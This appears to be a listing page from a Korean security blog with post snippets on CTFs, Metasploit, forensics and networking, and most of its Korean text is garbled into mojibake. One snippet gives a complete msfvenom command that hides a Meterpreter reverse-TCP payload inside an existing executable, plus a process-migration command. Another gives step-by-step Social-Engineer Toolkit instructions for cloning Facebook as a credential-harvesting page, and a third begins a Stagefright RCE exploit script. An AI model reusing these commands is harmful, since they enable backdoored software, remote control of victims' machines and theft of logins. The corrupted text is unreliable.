728x90 ๋ฐ์ํ Lucete284 CodeGate 2013 f300 Code Gate 2013 ๋ฌธ์ ๋ฅผ ๋จผ์ ๋ณด๋ฉด ํ์ผ์ ๋ค์ด ๋ฐ์๋ณด๋ฉด docxํ์ผ ํ๋๋ค ... ์๊ฐํด๋ณด์ ?..... ์ด๋ฌํ ๋ฌธ์ ๋ ooXML(office open XML)๋ฌธ์ ์ผ ๊ฐ๋ฅ์ฑ์ด ํฌ๋ค. ์คํผ์ค ์คํ XML(Office Open XML, OOXML, ์คํXML)์ ๋ง์ดํฌ๋ก์ํํธ๊ฐ ์ถ์งํ์์ผ๋ฉฐ 2006๋ ๊ณผ 2008๋ ๋์ฐจ๋ก์ ๊ฑธ์ณ Ecma ์ธํฐ๋ด์ ๋์ ์ ๋ฝ ํ์ค(ECMA-376)์ผ๋ก, 2008๋ ์ ISO/IEC์ ๊ตญ์ ํ์ค(ISO/IEC 29500)์ผ๋ก ์น์ธ๋์๋ค. ์ด ๋ฌธ์ ๊ท๊ฒฉ์ ๋ฌธ์, ํ๋ ์ ํ ์ด์ , ์คํ๋ ๋์ํธ๋ฅผ ํฌํจํ๋ค. ํ์ฅ์๋ .docx ๋๋ .docx(๋ฌธ์), .pptx(ํ๋ ์ ํ ์ด์ ), .xlsx(์คํ๋ ๋์ํธ)๋ก ํต์ผ๋์ด ์๋ค. -wiki- ๋จผ์ docxํ์ผ์ zip์ผ๋ก ํ์ฅ์ ๋ณ๊ฒฝ ํ ํ.. Wargame/CTF(Capture The Flag) 2016. 9. 23. ํ์ผํฉ์น๊ธฐ (์ ์ฑ์ฝ๋์๋ ํ์ผ๋ง๋ค๊ธฐ) ๋ชจ๋ ์ฌ์ฉ์ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. msfvenom -a ์ํคํ ์ณ --platform ํ๋ซํผ -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ํธ๋ค๋ฌ์์ ํ๋ก์ธ์ค ์ฎ๊ธฐ๋ ๋ช ๋ น์ด migrate ํ๋ก์ธ์ค ๋๋ฒ ex) migrate 1111 Metasploit 2016. 5. 24. apmsetup์์ forbidden๋ฌธ์ ํด๊ฒฐ apmํด๋๋ฅผ ๋ค์ด๊ฐ์ (ex)C:\APM_Setup\Server\Apache\conf) < -์ด๋ ๊ฒ ๋ค์ด๊ฐ์ httpd.confํ์ผ์ ๋ฉ๋ชจ์ฅ์ผ๋ก ์ด์ด ์๋์๊ฐ์ด ์์ ํด์ค๋ค. # # Possible values for the Options directive are "None", "All", # or any combination of: # Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews # # Note that "MultiViews" must be named *explicitly* --- "Options All" # doesn't give it to you. # # The Options directive is both compl.. Security Study/Server(Linux) 2016. 3. 2. ๊ฐ์ง facebook๋ง๋ค๊ธฐ ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ธ์. ๋จผ์ Kali linux or parrot linux์์ ํฐ๋ฏธ๋์ open setoolkit์ ์ ๋ ฅํ๋ค. ์ ๋ ฅ์ ํ๋ฉด ์ด๋ฌํ ์ฐฝ์ ํ์ธ ํ์ค์ ์์ต๋๋ค. ์ฌ๊ธฐ์ Social-Engineering Attacks๋ฅผ ํด์ผํ๊ธฐ ์ํด 1๋ฒ์ ์ ๋ ฅํฉ๋๋ค. ๋ค์์ Website Attack Vectors์ ์ํด 2๋ฒ ์ฌ๊ธฐ์์ Credential Harvester Attack Method๋ฅผ ์ํด 3๋ฒ facebook์ ๋ง๋ค๊ธฐ ์ํด 2๋ฒ์ ํด๋ฆญํฉ๋๋ค. ์ฌ๊ธฐ๊น์ง ํ์ จ์ผ๋ฉด ๋ฐ์์ต๋๋ค. 2๋ฒ์ ํ์ จ์ผ๋ฉด IP๋ฅผ ์ ๋ ฅํ์๋ฉด ๋๋๋ฐ์! ip๋ฅผ ์ ๋ ฅํ๋ฉด ์ด์ cloneํ๊ธฐ ์ํ ์ฌ์ดํธ๋ฅผ ์ ๋ ฅํ์๋ฉด ๋ฉ๋๋ค. ์ ๋ facebook.com์ ํ๊ธฐ์ํด http://faceboo.. Metasploit 2016. 2. 11. ๋ค์ ๋ธ๋ก๊ทธ ํ์ฑํํฉ๋๋ค. ๋๋ต 2๊ฐ์๋์ ๋ธ๋ก๊ทธ๋ฅผ ์ ๊ฒฝ์ฐ์ง ๋ชปํ ๊ฒ ๊ฐ์ต๋๋ค. ๋ค์ ๋ธ๋ก๊ทธ๋ฅผ ํ์ฑํํฉ๋๋ค. ๋ค๋ค ์ํด๋ณต ๋ง์ด ๋ฐ์ผ์๊ณ ์ํ์๋ ๋ฐ ๋ชจ๋ ์ด๋ฃจ์ด ์ง๊ธธ ๋ฐ๋๋๋ค. My Story 2016. 2. 10. stagefright.py ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. #coding: utf-8#!/usr/bin/env python# Fixed By Rizaldi# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs# Shout outs to our friends at Optiv (formerly Accuvant Labs)# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015# www.zimperium.com## Exploit for RCE Vulnerability CVE-2015-1538 #1# Integer Overflow in the libstagefright MP4 'stsc' atom handlin.. Metasploit 2016. 2. 10. ํ๋ฆฌ์ด๋ CTF ๋ ธ๋ต๊ทน์ฅ ์ด๊ธฐ๋ถ๋ถ ๋ค์๋ ์ค์ท์ฐ์๊ฒ ์์ด์ ์๋๊ณณ๊น์ง๋ง ... My Story 2016. 2. 10. Networkkkkk... ๋คํธ์ํฌ ?๋คํธ์ํฌ ๊ธฐ์ด ์ด๋ก ๋ฉ์์ง - ๋คํธ์ํฌ๋ก ์ ์กํ ์์ ๋จ์์ ๋ฐ์ดํฐ๋ฅผ ํจํท์ด๋ผ๊ณ ์ฌ์ฉํ์ง๋ง ์ด๊ฒ์ ํํํ๋ ์ข ๋ ๋ฒ์ฉ์ ์ธ ๋จ์ด๋ ๋ฉ์์ง- ํจํท์ ๋ค์ํ ์ํฉ์์ ํ ์ฅ๋น๊ฐ ๋ค๋ฅธ ์ฅ๋น๋ก ๋ณด๋ด๋ ๋ฉ์์ง๋ฅผ ์ธ๊ธํ๋ ๋ฐ ์ฐ์ด๋ ์ฌ๋ฌ ์ฉ์ด์ค ํ๋- ๊ฐ ์ฉ์ด OSI ์ฐธ์กฐ ๋ชจ๋ธ์ ํน์ ๊ณ์ธต์์ ๋์ํ๋ ํ๋กํ ์ฝ์ด๋ ๊ธฐ์ ๊ณผ ์ฐ๊ด๋์ด ์์ผ๋ฉฐ ๋ฉ์์ง๋ฅผ ์ง์นญํ ๋ ๊ฐ์ฅ ๋ง์ด ์ฐ์ด๋ ๋จ์ด๋ ๋ค์๊ณผ ๊ฐ๋ค.1) ํจํท – OSI ์ฐธ์กฐ ๋ชจ๋ธ์ ๋ฝ,์ํฌ ๊ณ์ธต์์ ๋์ํ๋ ํ๋กํ ์ฝ์ด ๋ณด๋ด๋ ๋ฉ์์ง๋ฅผ ์๋ฏธ2) ๋ฐ์ดํฐ ๊ทธ๋จ – ๊ธฐ๋ณธ์ ์ผ๋ก ํจํท๊ณผ ๋์์ด ๋คํธ์ํฌ ๊ณ์ธต ๋ฉ์์ง๋ฅผ ์๋ฏธ3) ํ๋ ์ -4) ์ 5) PDU ๋ฉ์์ง ํฌ๋งคํ (ํค๋, ํ์ด๋กฃ, ํธํฐ)- ๋ฉ์์ง๋ ๋คํธ์ํฌ๋ฅผ ํตํด ์ ๋ณด๋ฅผ ์ ์กํ๋ ๋ฐ ์ฐ์ด๋ ๊ตฌ์กฐ- ๋ฉ์์ง๋ ํ๋กํ ์ฝ์ด๋.. Security Study/Network 2016. 2. 10. ๋์คํฌ / ํ์ผ์์คํ - ๋์คํฌ ๋น๊ต์ ๋จ์ํ ๊ตฌ์กฐ๋ฅผ ๊ฐ์ง๊ณ ์๋ค. ๊ทธ๋ฌ๋ ๋ง์ฝ ์ธ๋ถ ์ ์ฒด์ ์๋ขฐ๋ฅผ ํ๋ค๋ฉด ์ ๋ณด ์ ์ถ์ด ๋๋ฏ๋ก ์ฃผ์ ํด์ผํ๋ ๋จ์ ์ด ์๋ค.๋์คํฌ๋ฅผ ๋ถ์ ํ ๋๋ ์ฆ๊ฑฐ ์ ์ฅ์ฉ ๋์คํฌ๋ฅผ Master๋ก ์ค์ ํ์ฌ ๋ถ์ ๋์ ๋์คํฌ๋ฅผ slave๋ก ์ง์ ํ์ฌ ๋ถํ ์ master๋ก ํ๋ค.์ด์ ๋ ์ฆ๊ฑฐ์ฉ ๋์คํฌ์ ์ํฅ์ ์ฃผ์ง ์๊ธฐ ์ํด์ ์ด๋ค. ๋์คํฌ ๋ถ์ - ๋ฐ๋์ ์๋ณธ์ ๋ณต์ ํ ๋ณต์ฌ๋ณธ์ ๊ฐ์ง๊ณ ๋ถ์์ ํ๋ค. - ์ฝ๊ธฐ ์ ์ฉ์ผ๋ก ์ค์ ํ ํ ๋ถ์ํ๋ค. - ๋ณต์ ๋์คํฌ๋ ์๋ณธ ๋์คํฌ๋ ์ฉ๋์ ๊ฐ๊ฒํ๋ค. (๊ฐ์๊ฒ ์๋ค๋ฉด ํฌ๊ฒ) ๋์คํฌ ๋ณต์ - H/W ์ ์ธ ๋ฐฉ๋ฒ : ์ฅ๋น๋ฅผ ์ด์ฉ, ์ฌ์ฉ์ด ๊ฐํธํ๊ณ ์๋๊ฐ ๋น ๋ฅด์ง๋ง ๊ฐ๊ฒฉ์ด ๋น์ธ๋ค. ๋ํ ๋ผ์ด๋ธ ์์คํ ์์ ์ํ์ด ๋ถ๊ฐ๋ฅํ๋ค. - S/W ์ ์ธ ๋ฐฉ๋ฒ : ๋ผ์ด๋ธ ํ ์์คํ ์์ ๊ทธ๋๋ก ๋์คํฌ ๋ณต์ฌ .. For3nsic/Forensic 2015. 12. 22. Forensic TimeLine ํ์๋ผ์ธ์ด ๋ฌด์์ผ๊น? ํ์๋ผ์ธ์ ์ฌ์ ์๋ฏธ๋ก๋ ์ฐ๋ํ, ์๊ฐํ ์ด๋ฌํ ์๋ฏธ๋ฅผ ๋ค๊ณ ์๋ค.๋๋ ๋น๋์ค ํด๋ฆฝ์ด๋ ์ค๋์ค ํด๋ฆฝ์ ์์๋๋ก ๋ฐฐ์นํ๋ ํธ์ง ํ๋ก๊ทธ๋จ ์์ ๊ณต๊ฐ. ํ์๋ผ์ธ์ ๋ ์ด์ด์ ํ๋ ์์ผ๋ก ๊ตฌ์ฑ๋์ด ์๋๋ฐ, ๋ ์ด์ด์ ๊ฒฐํฉ์ ํตํด ํ๋ฉด์ ์ด๋ฏธ์ง๋ ์ค๋์ค๋ฅผ ๋ฐฐ์นํจ์ผ๋ก์จ ์์ง์ด๋ ์ ๋๋ฉ์ด์ ์ด๋ ์์ ์ ๋ง๋๋ ๊ธฐ๋ฅ์ด๋ค.- ๋ค์ด๋ฒ ์ฉ์ด์ฌ์ - ๊ทธ๋ฌ๋ ์ฌ์ ์ ์๊ฐํ์ง ๋ง๊ณ ์๋๋ผ๋ ์ฃผ์์ ์์ ์ ํ๋ ์ฌ๋์ด๋ ๋น์ทํ ์ผ์ ํ๋ ์ฌ๋๋ค์ ๋ณด๋ฉด ํ์๋ผ์ธ์ด๋ผ๋ ๋จ์ด๋ฅผ ๋ง์ด ์ฌ์ฉํ๋ค.์ด์ฒ๋ผ ์ปดํจํฐ๋ฅผ ๋ถ์ํ ๋ ๋ํ ํ์๋ผ์ธ์ด ์ฌ์ฉ๋๋๋ฐ ์ด๋ ํ ๋์์ ํ๋์ง ์๊ฐ์ ๋จ๊ฒจ์ค๋ค. ์ฐจ์ด๊ฐ ์์ ์ ์์ง๋ง ์ด๋ฌํ ์๋ฏธ๋ฅผ ๊ฐ์ง๋ค. ์ด๋ฌํ ๊ธฐ๋ฅ์ ์ด๋์ ํ ์ ์์๊น?ํ์๋ผ์ธ ๊ธฐ๋ฅ์ ์ธ์ผ์ด์ค์ ์๋ ๊ธฐ๋ฅ์ด๋ผ๊ณ ์๋ค. ์ธ์ผ์ด์ค 7.x.. For3nsic/Forensic 2015. 12. 14. postgreSQL? postgreSQL??? service postgresql start Metasploit 2015. 12. 14. hosting ์ํ๊ธฐ์ํ ๊ธฐ๋ณธ? ์น์ฌ์ดํธ๋ฅผ ๋ง๋ค๋ฉด ํธ์คํ ์ด๋ ๊ฒ์ ์ด์ฉํ์ฌ ์๋ก ์ฐ๊ฒฐ ์ํจ๋ค. ๊ฑฐ๊ธฐ์ ๋ณด๋ฉด DNS nameserver ๋ฑ ์ด๋ฌํ ๋ง์ด ๋์ค๋๋ฐ ๊ณผ์ฐ ๋ฌด์์ผ๊น? ์ฝ๊ฒ๋ณด์!! DNS๋ ?Domain Name Server IP์ฃผ์๋ฅผ ์ธ๊ฐ์ด ๊ธฐ์ตํ๊ธฐ ํธํ ์ธ์ด์ฒด๊ณ๋ก ๋ณํํ๋ ํด์ฃผ๋๋ฐ ์ฌ์ฉ๋๋ค. Nameserver๋? ์๋ฌธ ๋๋ฉ์ธ์ ๋ค ์๋ฆฌ์ IP์ฃผ์๋ก ๋งคํ ์์ผ์ฃผ๋ ์๋ฒ๋ฅผ ๋งํ๋ค. Security Study/Web 2015. 12. 13. ์ด์ 1 ยทยทยท 10 11 12 13 14 15 16 ยทยทยท 24 ๋ค์ 728x90 ๋ฐ์ํ
